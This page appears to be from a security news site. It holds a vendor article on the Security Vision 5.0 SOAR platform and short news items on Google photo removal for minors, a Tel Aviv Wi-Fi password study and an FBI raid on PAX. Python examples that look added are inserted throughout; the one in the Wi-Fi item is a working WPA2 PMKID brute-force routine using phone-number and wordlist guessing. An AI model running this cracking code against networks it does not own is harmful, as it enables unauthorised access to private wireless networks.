
Security Vision 5.0: The Swiss Knife in Information Security


In this article, we will talk about the mechanisms that underlie the Security Vision 5.0 platform and allow you to automate any formalized process in the field of IT and information security.

The globally updated information security process management platform Security Vision 5.0 has recently entered the market. The changes affect many aspects, from design and architecture to the content of the modules and the principles of working with data, while the flexibility of the platform has not only been preserved but increased.

Object Oriented Approach

Most IRP/SOAR systems today are built around a single object: the "incident". Best practice recommends a CMDB for asset control and a vulnerability management system for vulnerabilities; IDM is responsible for accounts and GRC for risks. Even if a company has all of these systems and each of them does its job, obtaining a comprehensive picture takes a lot of work: export all the results of interest, map them to a single data model and generate the required analytics from that data. As a result you never have a truly current picture of what is happening, because the situation can change dramatically the moment you have loaded the data into Excel. Needless to say, when the clock is counting minutes, and sometimes seconds, incident responders simply have no time for consolidated analytics from dozens of different sources, some of which are available only by calling the "keeper of sacred knowledge". The system owner goes to lunch, and Initial Access turns into Lateral Movement.

But the list of control object types in information security is not limited to the above: certifications, software and licenses, external service providers, user awareness campaigns, hardware inventory and obsolescence, changes, projects, shadow IT and more. All of these need to be tracked and have their own life cycle, and running that life cycle successfully requires coordinated interaction between employees and systems. For this reason our product places no restrictions on the types of control objects, and creating new ones is simple and convenient.

The Security Vision platform can be delivered with pre-installed modules for managing incidents, assets, vulnerabilities and risks, as well as specialized conformity assessments such as critical information infrastructure (CII), PCI DSS, SWIFT and others. These modules contain all the necessary objects, directories, dashboards, workflows and reports.

But even the best analysts cannot think through every nuance of a customer's infrastructure, the peculiarities of the company's internal processes, or the requirements of regulators and the business. For this reason the main focus of our product is the flexibility of every element of the system, and that flexibility is available to an ordinary user without involving the vendor or integrators: without external scripts, directly in the platform interface, in NoCode mode or, for integrations, LowCode mode.

What does this flexibility look like in reality? Let’s consider several customization scenarios.

Incidents

Undoubtedly, the constantly growing number of incidents is the main driver of information security automation. Processing them should be as simple and clear as possible for the analyst, who has no time to read through a long string of incident properties in the hope of finding something meaningful. Depending on the type of incident, attention should go to completely different inputs, so different incident types have completely different views in Security Vision.

The incident handling process can be modified to match the company's existing incident handling policy or procedure. For example, let's add a "Closing reason" attribute to the incident card, required only when the status is "Waiting for closing confirmation", and editable only by a user with the role "Information security incident manager".

The calculation of the criticality of an incident can take into account any parameters of both the event itself and the objects involved in it.

In our case, the initial criticality of the incident and the criticality of the asset are used to calculate the criticality of the incident. For each of the incident types and information enrichment tools, you can assign your own criticality parameters and significance weights. You can use qualitative metrics or link the calculation to a quantitative risk assessment built in the company.

The field reflecting the quantitative assessment of potential damage can be hidden for employees of the first lines of support, making it available only to managers.

Object properties can be laid out on the card relative to one another and grouped into semantic blocks and tabs. The data display form lets you replace values with colour indicators or icons for greater clarity.

One of the most interesting features of the platform interface is the ability to add graphical widgets directly to object cards. A chart of incident counts per device or user involved in the incident, broken down by severity? A timeline of a user's VPN connections over the past month? No problem: adding such analytics to a specific incident type has never been easier.

Most incident handling systems use tree-structured workflows, which means an object can only move forward and never back. But it is often impossible to identify all involved accounts, hosts and IoCs in one pass. All containment stages have been carried out and the incident looks ready to close, and then the sandbox report reveals new objects and the picture of the investigation changes completely. In that situation it is only logical to return the incident to work.
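The four customizations described above (a field required only in one status and editable only by one role, criticality computed from the detector's initial severity and the asset's criticality with per-type weights, a damage field hidden from first-line analysts, and a workflow that can go backwards) are, at bottom, one small state machine. The following Python sketch is an added example and is not Security Vision code; the statuses, role names, field names and weight values are assumed for illustration.

```python
from dataclasses import dataclass, field

# Assumed weights per incident type: (initial severity weight, asset criticality weight).
# Both inputs are on a 1..4 scale (low .. critical).
WEIGHTS = {"malware": (0.4, 0.6), "phishing": (0.7, 0.3), "default": (0.5, 0.5)}

# Allowed status transitions. This is a graph, not a tree: "waiting_closure" -> "investigation"
# is the backward edge taken when, say, a sandbox report surfaces new hosts or IoCs.
TRANSITIONS = {
    "new": {"investigation"},
    "investigation": {"containment", "waiting_closure"},
    "containment": {"investigation", "waiting_closure"},
    "waiting_closure": {"closed", "investigation"},
    "closed": set(),
}
REQUIRED_BY_STATUS = {"waiting_closure": ("closing_reason",)}   # must be filled before entering
EDITABLE_BY = {"closing_reason": {"incident_manager"}}            # field -> roles allowed to edit it
HIDDEN_FROM = {"potential_damage": {"l1_analyst"}}                # field -> roles that must not see it


def criticality(kind: str, initial: int, asset_crit: int) -> int:
    """Weighted incident criticality, rounded half up and clamped to the 1..4 scale."""
    w_i, w_a = WEIGHTS.get(kind, WEIGHTS["default"])
    score = w_i * initial + w_a * asset_crit
    return max(1, min(4, int(score + 0.5)))


@dataclass
class Incident:
    kind: str
    initial_severity: int
    asset_criticality: int
    status: str = "new"
    fields: dict = field(default_factory=dict)
    history: list = field(default_factory=list)

    @property
    def severity(self) -> int:
        return criticality(self.kind, self.initial_severity, self.asset_criticality)

    def set_field(self, name: str, value, role: str) -> None:
        """Role check is enforced here, server-side, not only by hiding a button in the UI."""
        allowed = EDITABLE_BY.get(name)
        if allowed is not None and role not in allowed:
            raise PermissionError(f"role {role!r} may not edit {name!r}")
        self.fields[name] = value

    def transition(self, new_status: str, role: str, note: str = "") -> None:
        if new_status not in TRANSITIONS[self.status]:
            raise ValueError(f"{self.status} -> {new_status} is not allowed")
        missing = [f for f in REQUIRED_BY_STATUS.get(new_status, ()) if not self.fields.get(f)]
        if missing:
            raise ValueError(f"cannot enter {new_status!r}: missing {missing}")
        self.history.append((self.status, new_status, role, note))
        self.status = new_status

    def view(self, role: str) -> dict:
        """Card contents as this role is allowed to see them."""
        return {k: v for k, v in self.fields.items() if role not in HIDDEN_FROM.get(k, set())}


def demo() -> Incident:
    """Walk a malware incident forward, fail the closure checks, then reopen it."""
    inc = Incident("malware", initial_severity=2, asset_criticality=4)
    inc.fields.update({"hosts": ["ws-042"], "potential_damage": 120000})
    inc.transition("investigation", "l1_analyst")
    inc.transition("containment", "l1_analyst")
    try:
        inc.transition("waiting_closure", "l1_analyst")        # rejected: closing_reason missing
    except ValueError:
        pass
    try:
        inc.set_field("closing_reason", "Host reimaged", "l1_analyst")   # rejected: wrong role
    except PermissionError:
        pass
    inc.set_field("closing_reason", "Host reimaged, IoCs blocked", "incident_manager")
    inc.transition("waiting_closure", "incident_manager")
    # Sandbox report names a second host: take the backward edge instead of closing.
    inc.fields["hosts"].append("srv-db-01")
    inc.transition("investigation", "incident_manager", note="sandbox report: new C2 contact")
    return inc


if __name__ == "__main__":
    i = demo()
    print(i.status, i.severity, i.view("l1_analyst"), i.history)
```

The point of keeping the role and required-field checks inside `set_field` and `transition` rather than in the form layer is that an automated workflow step, an API client and a human analyst all go through the same gate.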

In Security Vision, incident handling reports can be generated directly from the card. You can use ready-made report templates, such as the NKTsKI (National Coordination Center for Computer Incidents) format, or customize your own within the company's existing methodology.

Integration

Everything above has mostly concerned the interface. The incident handling process gains real power thanks to the integration designer.

Today a SOC specialist has access to a huge number of paid and free services for enriching the available information. VirusTotal, ThreatCrowd, Hybrid Analysis: all of these integrations are available by default in most IRP/SOAR platforms. But consider a situation where we want to add a new enrichment source, or simply handle a new property returned by the API of a service we are interested in. You do not need to wait for the vendor or write Python scripts: in Security Vision the connection is set up in a couple of iterations and the desired value is obtained.

All that remains is to add the data retrieval to the incident handling workflow, choosing whether the action runs fully automatically or requires manual activation by the analyst.

But integrations are not only about friendly external APIs. Many infrastructure components are still difficult to fit into automated procedures. For example, a Cisco cluster in Active-Passive mode requires access to the currently active IP address. How does the system know which connection parameters to use? Redundant connector configurations let you define additional configurations that are applied if the main system is unavailable.

It is not always enough to get the data you need in one step. Quite often, for example with sandbox systems, the scenario looks like this:
1. send the file under examination;
2. get the request id;
3. query the analysis status at regular intervals;
4. finally, fetch the analysis results.
There are also more complex interactions, in which the credentials for the target system must first be obtained from a Privileged Access Management system and only then the operations of interest carried out. The connector steps mechanism handles such cases: data from one step can be used as input parameters for the next. Data transformation functions are available along the way: text, numeric, array and structure operations.

If the company already has ready-made response tools in the form of PowerShell, Bash, Python or other scripts, plugging them into the platform is not a problem. The script receives static values or variables from system objects, and the built-in regex, jpath, xpath and other handlers help you cope with any format of returned data.
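To make the three mechanisms from the last paragraphs concrete (redundant connector configurations tried in order, connector steps whose outputs feed the next step's inputs, and regex/jpath-style extraction of the result), here is an added Python sketch. It is not the platform's connector engine; the sandbox API (`submit`, `status`, `report`), the `{{step.path}}` placeholder syntax and the step descriptions are assumptions, and `FakeSandbox` is a constructed stand-in so the example runs offline.

```python
import re
import time
from typing import Any, Callable


class FakeSandbox:
    """Constructed stand-in for a sandbox API that needs submit -> poll -> fetch.
    reachable=False models a node that is down (the passive half of an Active-Passive pair)."""

    def __init__(self, name: str, reachable: bool, polls_until_done: int = 2):
        self.name, self.reachable, self.polls_until_done = name, reachable, polls_until_done
        self._polls: dict[str, int] = {}

    def ping(self) -> dict:
        if not self.reachable:
            raise ConnectionError(f"{self.name}: host unreachable")
        return {"ok": True}

    def submit(self, sha256: str) -> dict:
        job_id = f"job-{sha256[:8]}"
        self._polls[job_id] = 0
        return {"id": job_id}

    def status(self, job_id: str) -> dict:
        self._polls[job_id] += 1
        return {"state": "done" if self._polls[job_id] >= self.polls_until_done else "running"}

    def report(self, job_id: str) -> dict:
        return {"verdict": "malicious", "score": 87,
                "network": {"contacts": ["203.0.113.7:443", "198.51.100.9:8080", "203.0.113.7:80"]}}


def jpath(data: Any, path: str) -> Any:
    """Minimal dotted-path lookup, e.g. 'report.network.contacts[0]' (a stand-in for a jpath handler)."""
    for part in path.split("."):
        m = re.fullmatch(r"(\w+)\[(\d+)\]", part)
        data = data[m.group(1)][int(m.group(2))] if m else data[part]
    return data


def render(value: Any, ctx: dict) -> Any:
    """Replace {{step.path}} placeholders in a string with output from earlier steps."""
    if not isinstance(value, str):
        return value
    return re.sub(r"\{\{\s*([\w.\[\]]+)\s*\}\}", lambda m: str(jpath(ctx, m.group(1))), value)


def connect(configs: list[dict]) -> Any:
    """Try the primary configuration first, then each redundant one; raise only if all fail."""
    errors = []
    for cfg in configs:
        try:
            cfg["client"].ping()
            return cfg["client"]
        except ConnectionError as e:
            errors.append(str(e))
    raise ConnectionError("all connector configurations failed: " + "; ".join(errors))


def run_steps(client: Any, steps: list[dict], ctx: dict,
              sleep: Callable[[float], None] = time.sleep) -> dict:
    """Run steps in order; each step's output is stored under its name for later placeholders."""
    for step in steps:
        args = {k: render(v, ctx) for k, v in step.get("args", {}).items()}
        call = getattr(client, step["call"])
        until = step.get("until")
        for _ in range(step.get("max_polls", 1)):
            out = call(**args)
            if until is None or jpath(out, until["path"]) == until["equals"]:
                break
            sleep(step.get("interval", 0))
        else:
            raise TimeoutError(f"step {step['name']!r} never reached {until}")
        ctx[step["name"]] = out
    return ctx


SANDBOX_STEPS = [
    {"name": "submit", "call": "submit", "args": {"sha256": "{{input.sha256}}"}},
    {"name": "poll", "call": "status", "args": {"job_id": "{{submit.id}}"},
     "until": {"path": "state", "equals": "done"}, "max_polls": 10, "interval": 5.0},
    {"name": "report", "call": "report", "args": {"job_id": "{{submit.id}}"}},
]


def enrich(sha256: str, configs: list[dict], sleep: Callable[[float], None] = time.sleep) -> dict:
    """Full connector run: failover, multi-step exchange, then regex extraction of contacted IPs."""
    client = connect(configs)
    ctx = run_steps(client, SANDBOX_STEPS, {"input": {"sha256": sha256}}, sleep)
    ip_re = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3}):\d+$")
    ips = sorted({ip_re.match(c).group(1) for c in jpath(ctx, "report.network.contacts")})
    return {"via": client.name, "verdict": jpath(ctx, "report.verdict"),
            "score": jpath(ctx, "report.score"), "ips": ips,
            "polls": client._polls[ctx["submit"]["id"]]}


if __name__ == "__main__":
    configs = [{"client": FakeSandbox("sandbox-node-1", reachable=False)},
               {"client": FakeSandbox("sandbox-node-2", reachable=True)}]
    print(enrich("a" * 64, configs, sleep=lambda s: None))
```

Two details matter in practice: the poll loop has a hard `max_polls` bound so a sandbox that never finishes cannot hang the workflow, and the extracted IPs are de-duplicated and sorted before they are written back to the incident, so the same C2 address seen on two ports does not become two indicators.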

Many companies face the problem of processing large reports, for example from vulnerability scanners. An infrastructure scan file can be several gigabytes in size, while many systems cannot process files larger than about 100 MB. Security Vision connectors cope even with this task, which is unsolvable for many.

Complex report structures are another non-trivial task. For example, the scan policy and the credentials used are in one section (namespace), the plugins used in another, and the scan results in a third. How do you turn the report into a single table instead of three? In Security Vision this is very easy to do.
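The two problems just described, a report too large to load at once and a report whose policy, plugin catalogue and results sit in three separate sections, are usually solved together: stream the file once and join the sections as they go by. The following Python example is added here and is not the platform's parser; the XML schema is constructed for illustration and does not reproduce any real scanner's format.

```python
import io
import xml.etree.ElementTree as ET
from typing import BinaryIO, Iterator

# Constructed sample in a hypothetical schema: policy, plugin catalogue and per-host results
# live in three separate sections. Not any real scanner's format.
SAMPLE_REPORT = b"""<?xml version="1.0"?>
<ScanReport>
  <Policy name="Full audit"><Credential type="ssh" user="svc-scan"/></Policy>
  <Plugins>
    <Plugin id="1001" name="OpenSSH before 8.9: multiple issues" severity="High"/>
    <Plugin id="1002" name="TLS 1.0 enabled" severity="Medium"/>
  </Plugins>
  <Results>
    <Host ip="10.0.0.5" fqdn="web-01.example.test">
      <Finding plugin="1001" port="22"/><Finding plugin="1002" port="443"/>
    </Host>
    <Host ip="10.0.0.9" fqdn="db-01.example.test"><Finding plugin="1002" port="8443"/></Host>
  </Results>
</ScanReport>"""


def stream_rows(source: BinaryIO) -> Iterator[dict]:
    """Yield one flat row per finding without loading the whole report into memory.

    Assumes Policy and Plugins precede Results, which is how such reports are normally laid out.
    Every element is cleared once consumed, so memory is bounded by one <Host> subtree rather
    than by the file size.
    """
    policy = {"policy": None, "credential": None}
    plugins: dict[str, dict] = {}
    for _event, elem in ET.iterparse(source, events=("end",)):
        if elem.tag == "Policy":
            cred = elem.find("Credential")
            policy["policy"] = elem.get("name")
            policy["credential"] = f"{cred.get('type')}:{cred.get('user')}" if cred is not None else None
            elem.clear()
        elif elem.tag == "Plugin":
            plugins[elem.get("id")] = {"plugin": elem.get("name"), "severity": elem.get("severity")}
            elem.clear()
        elif elem.tag == "Host":
            for f in elem.findall("Finding"):
                info = plugins.get(f.get("plugin"), {"plugin": "unknown plugin", "severity": None})
                yield {"ip": elem.get("ip"), "fqdn": elem.get("fqdn"), "port": int(f.get("port")),
                       "plugin_id": f.get("plugin"), **info, **policy}
            elem.clear()   # drop the host subtree: this is what keeps a multi-GB file processable


def flatten(report: bytes) -> list[dict]:
    """Convenience wrapper for an in-memory report; for a real file pass an open binary handle."""
    return list(stream_rows(io.BytesIO(report)))


if __name__ == "__main__":
    for row in flatten(SAMPLE_REPORT):
        print(row)
```

The joined row carries the policy and credential used alongside each finding, which is exactly what an analyst needs to tell an authenticated "not vulnerable" from an unauthenticated "could not check". If the input is a very long stream, the cleared elements still leave empty stubs under the root; for multi-gigabyte files it is worth also detaching finished `<Host>` elements from their parent.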

All of the integrations described above can run both inside a workflow and on a schedule in the task scheduler. The results can be stored in object properties or reference books, or the platform can create new objects from them: indicators of compromise, vulnerabilities, assets, or object types defined by the user.

Assets

Having looked at object creation in general, let's take a closer look at the part responsible for inventory and working with assets. In Security Vision, the source of asset data can be any information store available for integration: Active Directory, a CMDB, virtualization management tools or the asset model of a SIEM. Most often, the built-in agentless scanning mechanism is used to identify systems.

If no account is available or authentication fails, the host can be identified by indirect signs: responses from services, information in Active Directory, or custom rules (for example, based on host naming conventions).

If authentication succeeds, inventory scripts collect information about configuration, security status, software, updates and other system components. All inventory scripts are written in Bash and PowerShell, so any technician can read them, modify them to suit their needs, or troubleshoot errors and incorrect data.

Out of the box, Security Vision can obtain information about users and groups, virtualization, startup items and much more. If this is not enough, the system lets you add retrieval of any system property available for machine collection. Such custom operations can be implemented either by adding the necessary calls to the regular inventory process or by creating a manual operation available from the asset card.
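The fallback described a few paragraphs up, identifying a host by indirect signs when the inventory scripts cannot log in, is a question of evidence precedence: authenticated inventory outranks the Active Directory record, which outranks a naming-convention rule, which outranks a service banner. The Python sketch below is an added illustration, not the platform's discovery engine; the `Observation` fields, the `<role>-<site>-<nn>` naming rule and the confidence values are assumptions, and the two observations are constructed.

```python
import re
from dataclasses import dataclass, field
from typing import Callable, Optional


@dataclass
class Observation:
    """What an agentless scan learned about one address (constructed, hypothetical fields)."""
    ip: str
    auth_ok: bool = False
    inventory: dict = field(default_factory=dict)   # from the inventory scripts after a successful login
    banners: dict = field(default_factory=dict)     # port -> banner from unauthenticated service probes
    ad_computer: Optional[dict] = None              # matching computer object from Active Directory
    reverse_dns: Optional[str] = None


# Hypothetical naming convention: <role>-<site>-<nn>, e.g. db-tlv-01
NAME_RULE = re.compile(r"^(?P<role>srv|ws|db|fw)-(?P<site>[a-z]{3})-\d{2}$", re.I)
ROLE_LABELS = {"srv": "server", "ws": "workstation", "db": "database", "fw": "firewall"}


def from_inventory(o: Observation) -> dict:
    if not (o.auth_ok and o.inventory):
        return {}
    return {"hostname": o.inventory.get("hostname"), "os": o.inventory.get("os")}


def from_active_directory(o: Observation) -> dict:
    if not o.ad_computer:
        return {}
    return {"hostname": o.ad_computer["dNSHostName"].split(".")[0],
            "os": o.ad_computer.get("operatingSystem")}


def from_hostname_rule(o: Observation) -> dict:
    short = (o.reverse_dns or "").split(".")[0]
    m = NAME_RULE.match(short)
    if not m:
        return {}
    return {"hostname": short, "role": ROLE_LABELS[m["role"].lower()], "site": m["site"].lower()}


def from_banners(o: Observation) -> dict:
    text = " ".join(o.banners.values())
    if "Microsoft" in text:
        return {"os_family": "windows"}
    if re.search(r"OpenSSH|Ubuntu|Debian", text):
        return {"os_family": "linux"}
    return {}


# Ordered strongest to weakest; a weaker source only fills in what is still unknown.
SOURCES: list[tuple[str, float, Callable[[Observation], dict]]] = [
    ("inventory", 1.0, from_inventory),
    ("active_directory", 0.8, from_active_directory),
    ("hostname_rule", 0.5, from_hostname_rule),
    ("service_banner", 0.3, from_banners),
]


def identify(o: Observation) -> dict:
    """Merge evidence in precedence order and record which source supplied each attribute."""
    asset: dict = {"ip": o.ip, "evidence": []}
    for name, confidence, extract in SOURCES:
        new = {k: v for k, v in extract(o).items() if v is not None and k not in asset}
        if new:
            asset.update(new)
            asset["evidence"].append((name, confidence, sorted(new)))
    asset["confidence"] = max((c for _, c, _ in asset["evidence"]), default=0.0)
    return asset


if __name__ == "__main__":
    # Constructed: login failed, but AD, reverse DNS and a SQL Server banner are available.
    print(identify(Observation(
        ip="10.1.2.3",
        ad_computer={"dNSHostName": "db-tlv-01.corp.example", "operatingSystem": "Windows Server 2019"},
        reverse_dns="db-tlv-01.corp.example",
        banners={1433: "Microsoft SQL Server 2019"})))
    # Constructed: nothing but an SSH banner.
    print(identify(Observation(ip="10.1.9.9", banners={22: "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3"})))
```

Recording the evidence list per attribute is the part worth keeping: when an asset later turns out to be misclassified, the analyst can see that "database" came from a hostname prefix and not from an authenticated inventory, and tune the rule rather than the data.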

Our customers often find that inventory data is insufficient even across disparate systems. What is the criticality of this system? Is it a production or a test environment? Who is the business owner and who is the technical administrator? Collection of this kind of information from users can be built directly in Security Vision: the workflow itself sends an e-mail to the employee responsible for the inventory and to the system owner, reminding them to fill in the required parameters. The interface for such user roles can be configured so that only the necessary menus and objects are available for viewing and filling in.

Any information contained in Security Vision can be presented as reports and dashboards. The dashboard builder lets you customize drill-down actions, for example showing a detailed description of a selected category or navigating to another related dashboard. Using the builder does not require technical knowledge: building analytics resembles pivot tables and charts in Excel. For more advanced statistics, you can write your own SQL queries right in the builder interface.

This is just a short list of the tools that let the Security Vision platform optimize and automate almost any information security process. The flexibility of each element lets you implement scenarios for your company's specific tasks without running into product limits or commissioning custom development.

Security Vision brings people and systems together in a single solution. This approach achieves an unprecedented level of automation even in processes that previously required significant human resources. Stay tuned for updates on our website: in the following articles we will describe the SGRC module and its functions for working with audits, risks and compliance assessment, show how a process for managing vulnerabilities and updates can be built on the Security Vision platform, and explain how the data loaded into the platform from the MITRE ATT&CK framework and related projects can help raise the maturity level of your SOC.



New feature from Google allows minors to remove their photos from search


This function was first introduced in August this year, but it has become widely available only now.

Google has launched a new safety feature that allows individuals under eighteen to request removal of their photos from search results. The company first announced its plans for this feature in August this year, but it has only now become widely available.

Anyone can start the removal process on the corresponding support page. To do so, you need to provide the URLs of the images to be removed from search results, the search terms for which the search engine returns these photos, the name and age of the minor, and the name of the person acting on their behalf and their status (for example, parent or guardian).

As with other erasure requests, it is difficult to say what criteria Google will follow when making a decision. According to the company, images of all minors will be removed “except in cases of public interest or informational value.” It is difficult to say what this will mean in practice.

Based on Google's wording, only requests from individuals who are currently under eighteen will be accepted. It follows that a person who is, say, thirty will not be able to request the removal of photographs in which they are fifteen.

Google also notes that removing photos from search results does not remove them from the internet. The company advises users requesting removal of images to contact the site's webmaster first. If that leads nowhere, however, removing the images from Google search results will still be an important step.



Information security expert hacked Wi-Fi networks in Tel Aviv to find out their reliability


The specialist managed to hack 73% of the 5 thousand studied wireless networks.

CyberArk researcher Ido Hoorvitch conducted an interesting experiment to find out how strong Wi-Fi network passwords are in his home town of Tel Aviv.

Using equipment for intercepting Wi-Fi packets, Hoorvitch collected a sample of 5,000 network hashes, exploiting a vulnerability to obtain PMKIDs (Pairwise Master Key Identifiers). For this he used a $50 network card with monitor-mode and packet-injection support, plus Wireshark.

A PMKID is a hash derived from the password, the access point's MAC address, the client's MAC address and the network name (SSID). Because all of these except the password are visible on the air, a captured PMKID can be attacked offline by trying candidate passwords.

Hoorvitch first checked how many users had set their mobile phone number as the wireless password (a common practice in Israel). To crack such a password, it is enough to enumerate all combinations of Israeli phone numbers. Using a standard laptop, the researcher cracked 2,200 passwords, taking on average about 9 minutes each.

Hoorvitch then used a standard dictionary attack. With the rockyou.txt wordlist he cracked another 1,359 passwords (almost all of them consisted only of lowercase characters).

In total, Hoorvitch recovered the passwords of 3,663 of the 5,000 (73%) wireless networks studied in Tel Aviv. The technical details of the study can be found here.
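The two phases of the study, a phone-number mask and then a wordlist, come down to recomputing the PMKID for each candidate and comparing it with the captured one. The Python example below is added here and is not the researcher's code or tooling. The derivation it implements is the standard one from IEEE 802.11: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes) and PMKID = HMAC-SHA1-128(PMK, "PMK Name" || MAC_AP || MAC_STA). The SSID, MAC addresses, target passwords and the tiny candidate windows are constructed so that the example finishes in well under a second.

```python
import hashlib
import hmac
from typing import Iterable, Optional


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def compute_pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || MAC_AP || MAC_STA): the first 16 bytes of the HMAC."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def mac(s: str) -> bytes:
    return bytes.fromhex(s.replace(":", ""))


def phone_number_candidates(prefixes: Iterable[str], start: int, count: int) -> Iterable[str]:
    """Israeli mobile numbers are 05X followed by 7 digits, i.e. 10^7 candidates per prefix.
    Only a small window is generated here so the example runs quickly; a real run covers all of it."""
    for p in prefixes:
        for n in range(start, start + count):
            yield f"{p}{n:07d}"


def crack_pmkid(target: bytes, ssid: str, ap_mac: bytes, sta_mac: bytes,
                candidates: Iterable[str]) -> Optional[str]:
    """Offline guess: one PBKDF2 (4096 rounds) plus one HMAC per candidate; this is the whole cost."""
    for pw in candidates:
        if hmac.compare_digest(compute_pmkid(derive_pmk(pw, ssid), ap_mac, sta_mac), target):
            return pw
    return None


# Constructed "capture". In a real test the SSID, both MACs and the PMKID come from the
# access point's first EAPOL frame, captured with a monitor-mode card.
SSID = "TLV-Home-5G"
AP_MAC = mac("02:00:5e:11:22:33")
STA_MAC = mac("02:00:5e:44:55:66")


def demo() -> dict:
    """Recreate the two phases on constructed targets: phone-number mask first, wordlist second."""
    target_phone = compute_pmkid(derive_pmk("0540000005", SSID), AP_MAC, STA_MAC)
    target_word = compute_pmkid(derive_pmk("sunshine", SSID), AP_MAC, STA_MAC)

    def phone_window() -> Iterable[str]:
        return phone_number_candidates(("050", "052", "054"), start=0, count=8)

    wordlist = ["123456", "password", "iloveyou", "sunshine", "princess"]  # constructed rockyou-style slice
    return {
        "phone_mask_on_phone_pw": crack_pmkid(target_phone, SSID, AP_MAC, STA_MAC, phone_window()),
        "phone_mask_on_word_pw": crack_pmkid(target_word, SSID, AP_MAC, STA_MAC, phone_window()),
        "wordlist_on_word_pw": crack_pmkid(target_word, SSID, AP_MAC, STA_MAC, wordlist),
    }


if __name__ == "__main__":
    print(demo())
```

The numbers explain the study's results: a 10-digit phone number with a known 3-digit prefix is a keyspace of 10^7 per prefix, which a laptop exhausts in minutes per network even at 4096 PBKDF2 rounds per guess, whereas a random 12-character passphrase is out of reach. Real captures are cracked with GPU tools such as hashcat rather than pure Python; the loop above only makes the per-guess work visible.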



The FBI raids the American office of PAX Technology


The searches are related to the suspicion of the possible use of PAX equipment in cyberattacks.

Officials from the US Federal Bureau of Investigation have raided the Florida office of PAX Technology, a Chinese PoS terminal manufacturer. As reported by journalist Brian Krebs, the searches are related to reports of the possible use of PAX systems in cyberattacks against organizations in the United States and Europe.

PAX Technology is one of the world’s largest payment terminal manufacturers and a leading provider of trading solutions and services. The company is headquartered in Shenzhen, China.

According to the American radio station WOKV, the FBI and the Department of Homeland Security raided the PAX Technology warehouse in Jacksonville. Investigators said the searches were carried out under a court order as part of a federal investigation by the Department of Homeland Security with the participation of Customs and Border Protection and the Naval Criminal Investigative Service. The FBI did not comment.

According to Krebs, citing trusted sources, the FBI launched its investigation into PAX after a major US payment service provider noticed unusual network packets originating from the company's payment terminals. According to those sources, PAX terminals were being used as a malware dropper and as command-and-control infrastructure for staging attacks and collecting information.

PAX Technology did not respond to Brian Krebs’s inquiry about the situation.

Two major financial providers in the US and UK have already begun to remove PAX terminals from the payment infrastructure, sources said.

"My sources say there is technical evidence for the use of terminals in cyberattacks. The packet sizes do not match the billing information they are supposed to send and do not correlate with the telemetry these devices are supposed to display in the event of a software update. PAX now claims the investigation is racially and politically motivated," the source said.

Krebs's source did not provide details about the unusual network activity that led to the FBI investigation.
